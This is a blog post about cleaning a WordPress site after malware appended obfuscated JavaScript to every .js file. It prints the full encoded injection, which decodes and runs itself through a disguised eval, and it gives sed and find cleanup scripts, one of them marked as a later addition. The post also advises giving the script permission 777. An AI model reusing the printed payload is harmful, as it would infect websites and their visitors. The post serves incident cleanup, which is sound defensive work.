
WordPress Malware attack on Javascript files

My website was hacked during the Christmas holidays and I realized it only after 12 days. When I checked my PHP files they seemed all right, except for some files which had write permission. It was a strange attack: they were filling the content with links to some extra websites and copies. The malware had also created some files containing IP details, which might be used for placing the links.

The interesting part is that it generated some JavaScript code and added it to all js files. The format of the code was a little bit tricky, and I needed to spend some more hours to get a regular expression that does the job of removing the hacker code. Luckily it added the code at the end of each js file, which made the task easier; otherwise it would have been a nightmare.

You can look at the hacker code below. The code starts and ends with a string which is unique for each file. It would have been difficult if the code had not been placed at the end of the js file.

/*9f505a67cd1aff2f9b66786278792824*/try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h","1n","1f","1f","1h","3j","27","4l","d","a","3o","4d","46","3l","4c","41","47","46","16","4a","4b","1e","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1k","4c","47","35","4c","4a","41","46","3p","1e","1p","22","1f","1k","4b","4d","3k","4b","4c","4a","41","46","3p","1e","21","1f","27","4l","d","a","41","3o","1e","46","3j","4e","41","3p","3j","4c","47","4a","1k","3l","47","47","43","41","3n","2h","46","3j","3k","44","3n","3m","16","1c","1c","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","1k","41","46","3m","3n","4g","31","3o","1e","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1f","29","29","1j","1n","1f","4j","d","a","9","4e","3j","4a","16","4b","4c","46","45","29","4a","4b","1e","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","1d","28","4b","4c","4h","44","3n","2a","1k","4b","1d","1h","4b","4c","46","45","1h","1d","16","4j","16","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","16","44","3n","3o","4c","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4c","47","48","26","1j","1d","1h","3p","4a","3j","1e","22","1m","1m","1i","1n","1m","1m","1m","1f","1h","1d","48","4g","27","16","4l","28","1l","4b","4c","4h","44","3n","2a","16","28","3m","41","4e","16","3l","44","3j","4b
","4b","29","18","4b","1d","1h","4b","4c","46","45","1h","1d","18","2a","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","18","40","4c","4c","48","26","1l","1l","48","48","40","47","3n","46","41","4g","1k","47","4a","3p","1l","3j","3m","1l","3o","3n","3n","3m","1k","48","40","48","18","16","4f","41","3m","4c","40","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","16","40","3n","41","3p","40","4c","29","18","1d","1h","3p","4a","3j","1e","1p","1m","1m","1i","22","1m","1m","1f","1h","1d","18","2a","28","1l","41","3o","4a","3j","45","3n","2a","28","1l","3m","41","4e","2a","1d","1f","27","d","a","9","4e","3j","4a","16","3n","4g","48","29","46","3n","4f","16","2g","3j","4c","3n","1e","1f","27","3n","4g","48","1k","4b","3n","4c","2g","3j","4c","3n","1e","3n","4g","48","1k","3p","3n","4c","2g","3j","4c","3n","1e","1f","1h","23","1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-603!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}/*9f505a67cd1aff2f9b66786278792824*/

You can remove the above code from all attacked js files with the following method. Make sure that the hacked code was placed at the end of each js file.

Step 1: Create a shell script in the root folder with the following code and give permission 777 to the file. For example, cleanmal.sh

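#!/bin/sh
# Usage: ./cleanmal.sh <path_to_the_js_file>

src="$1.hack"   # backup copy of the infected file
dst="$1"
mv "$dst" "$src"

# On the last line only ($), delete everything from the first "/*" to the end of the line
sed -e '$ s,/\*.*,,' "$src" > "$dst"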

Step 2: Check that the script removes the hacker code properly from a js file. Run the command below.

./cleanmal.sh <path_to_the_js_file>

The command creates a backup file named your_file_name.js.hack. Then check your js file: if the hacker code is removed, the script is working fine.

Step 3: Run the commands below, in the same order, from the root folder.

     find . -name '*.js' -exec ./cleanmal.sh {} \;   # remove the code
     find . -name '*.hack' -exec rm -f {} \;         # remove all backup files
     find . -name '*.js' -exec chmod 555 {} \;       # make all js files write-protected
     rm cleanmal.sh                                  # finally, remove the script
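
The sed expression in Step 1 deletes everything from the first /* on the last line, so a clean js file whose last line happens to contain a comment is truncated as well. A stricter variant, added here as an example and not part of the original post, strips only a block that opens and closes with the same marker comment at the end of the last line and leaves every other file untouched. It assumes the marker is always 32 lowercase hex characters, as in the sample above; the names clean_js and clean_tree are hypothetical.

```sh
#!/bin/sh
# Added example, not the original post's script.
# Assumption: the injected block is "/*<32 hex>*/ ... /*<same 32 hex>*/"
# and sits at the very end of the file's last line, as in the sample above.
PATTERN='/\*\([0-9a-f]\{32\}\)\*/.*/\*\1\*/[[:space:]]*$'

# clean_js FILE (hypothetical helper)
# Returns 0 if an injected block was removed (backup kept as FILE.hack),
#         1 if the file did not match and was left untouched,
#         2 on error.
clean_js() {
    f=$1
    [ -f "$f" ] || return 2
    tmp=$(mktemp "$f.XXXXXX") || return 2
    # "$" restricts the substitution to the last line; \1 forces the
    # closing marker to equal the opening one.
    sed -e "\$ s|$PATTERN||" "$f" > "$tmp" || { rm -f "$tmp"; return 2; }
    if cmp -s "$f" "$tmp"; then
        rm -f "$tmp"            # nothing matched: not infected in this form
        return 1
    fi
    # Keep a backup, then overwrite in place so owner and mode are preserved.
    cp -p "$f" "$f.hack" && cat "$tmp" > "$f" || { rm -f "$tmp"; return 2; }
    rm -f "$tmp"
    return 0
}

# clean_tree DIR (hypothetical helper): clean every .js file below DIR
# and print the path of each file that was changed.
clean_tree() {
    find "$1" -type f -name '*.js' | while IFS= read -r js; do
        if clean_js "$js"; then
            printf 'cleaned: %s\n' "$js"
        fi
    done
}

# Stand-alone use: pass the site root as the first argument.
if [ "$#" -gt 0 ]; then
    clean_tree "$1"
fi
```

The printed list doubles as a record of which files were infected; review the .hack backups against it before deleting them.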

Hope everything will be fine after this :)


About
View Sarath D R's profile on LinkedIn

I am a technology consultant and an entrepreneur focused on the following technologies: Java, Spring, Android, Angular, Asterisk, Symfony, Cake, Code-Igniter, Jquery, XAMPP, XHTML, AJAX, MySql, Seo, Web Design, Wordpress, iPhone development.
